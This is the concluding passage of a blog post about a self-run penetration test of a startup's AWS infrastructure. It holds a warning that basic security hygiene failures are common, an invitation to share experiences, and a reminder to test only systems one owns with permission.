This 30-minute penetration test should be a wake-up call for every startup running on AWS. The speed and ease with which I compromised my own “secure” infrastructure demonstrates that traditional security approaches are fundamentally inadequate.

The most terrifying part? Everything I discovered is completely typical for startup AWS environments. These aren’t exotic vulnerabilities or zero-day exploits - they’re basic security hygiene failures that exist in the majority of growing companies.

Your startup’s AWS security is probably broken. The question isn’t whether you have vulnerabilities - it’s whether you’ll discover them before an attacker does.

What’s your next move?


This post generated significant discussion on LinkedIn and Product Hunt. If you’ve conducted similar security tests or discovered surprising vulnerabilities in your own infrastructure, I’d love to hear about it. Share your experiences in the comments or reach out directly.

Remember: never test these techniques on systems you don’t own, and always get explicit permission before conducting security testing.

Back to Blog

Related Posts

View All Posts »